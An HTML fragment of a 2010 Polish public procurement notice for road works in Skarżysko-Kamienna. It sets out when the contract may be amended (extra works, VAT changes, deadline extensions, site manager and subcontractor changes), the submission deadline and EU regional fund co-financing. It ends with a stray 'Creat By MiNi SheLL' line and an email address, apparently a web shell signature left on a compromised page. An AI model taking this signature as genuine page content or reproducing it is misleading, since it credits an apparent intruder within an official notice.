pkt. 1,2 nie wymaga zawarcia z wykonawcą aneksu do umowy, ale na skutek ich wystąpienia może ulec zmianie termin wykonania oraz zmiana wynagrodzenia wykonawcy.6.W związku z przyjętą kosztorysową formą rozliczania robót mogą zmienić się  ilości wykonanych  robót  w stosunku do przyjętych w przedmiarze. Powyższe wynikać będzie z książki obmiaru i uwzględnione zostanie w kosztorysie powykonawczym.    
II. Zmiany dotyczące wynagrodzenia Wykonawcy
1.  Wynagrodzenie może ulec zmianie w przypadku wystąpienia robót dodatkowych koniecznych oraz robót zamiennych, o których mowa w pkt. I.1, ograniczenia zakresu rzeczowego robót, o którym mowa w pkt. I.2. oraz w przypadku zmian ilości robót w poszczególnych pozycjach kosztorysu ofertowego w związku z wystąpieniem okoliczności, o których mowa w pkt. I.6. 2. Zamawiający dopuszcza zmianę wynagrodzenia brutto należnego wykonawcy w przypadku zmiany ustawowej stawki podatku od towarów i usług VAT. 3. Zmiana wynagrodzenia wynikająca z ostatecznego rozliczenia robót objętych umową, z uwzględnieniem zmian na skutek wystąpienia powyższych okoliczności wymagać będzie sporządzenia aneksu do umowy.
 III. Zmiany dotyczące terminu wykonania przedmiotu umowy
1. Zamawiający dopuszcza możliwość przedłużenia terminu wykonania umowy w przypadku wystąpienia niezależnych od wykonawcy okoliczności, w szczególności zaś:
a) wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru,
b) wystąpienia konieczności wykonania robót dodatkowych koniecznych lub zamiennych,  o których mowa w § 1 ust. 5,  
c) wystąpienia konieczności wykonania robót nieprzewidzianych,  o których mowa a art. 67 ust.1 pkt 5 ustawy Prawo zamówień publicznych, 
W przypadku zaistnienia ww okoliczności Zamawiający może przedłużyć termin zakończenia wykonania umowy na pisemny, szczegółowo uzasadniony wniosek Wykonawcy zaakceptowany przez inspektora nadzoru inwestorskiego. Okres przesunięcia terminu nie może być dłuższy niż czas trwania tych okoliczności.
2. Dopuszcza się zmianę terminu przedłużenia wykonania umowy w przypadku:
a)  wystąpienia przestojów i opóźnień ze strony Zamawiającego, 
b) działania siły wyższej, rozumianej jako zdarzenie nagłe, nieprzewidywalne                       
    niezależne od woli stron (np. klęski żywiołowe, strajki generalne lub lokalne, znaleziska archeologiczne) mające bezpośredni wpływ na terminowość realizacji robót,
c) w przypadku wystąpienia okoliczności, których strony nie były w stanie przewidzieć w chwili zawierania umowy, pomimo zachowania należytej staranności. 
W w/w przypadkach strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia  terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub postoju.      
3. W przypadku przedłużenia terminu zakończenia przedmiotu umowy zostanie zawarty aneks do umowy.
IV. Zmiany dotyczące  osoby kierownika budowy
Zamawiający dopuszcza zmianę kierownika budowy (kierownika robót) na pisemny uzasadniony wniosek Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty otrzymania wniosku pod warunkiem, gdy wskazana osoba spełniać będzie wymagania określone w specyfikacji istotnych warunków zamówienia. Zmiana osoby na stanowisku kierownika budowy (kierownika robót) nie będzie wymagała sporządzania aneksu do umowy. 
Jakakolwiek przerwa w realizacji przedmiotu umowy wynikająca z braku kierownika budowy będzie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia robót.              V. Zmiany dotyczące podwykonawcy
			1.  Zamawiający dopuszcza zmianę podwykonawcy pod warunkiem, że nowy 			podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany		na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca i na 		przedstawiony w ofercie zakres robót. 
			2. Zmiana podwykonawcy wymaga pisemnego powiadomienia Zamawiającego oraz 		rozliczenia wykonanych robót z dotychczasowym podwykonawcą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spskarzysko.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd  Dróg Powiatowych w Skarżysku-Kamiennej  ul. Konarskiego 20, 26-110 Skarżysko-Kamienna pokój 412 (IV piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2010 godzina 09:00, miejsce: Zarządz Dróg Powiatowych w Skarżysku-Kamiennej  ul. Konarskiego 20, 26-110 Skarżysko-Kamienna pokój 412 (IV piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia realizowany będzie  przy współfinansowaniu przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013. Oś priorytetowa 3, działanie 3.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com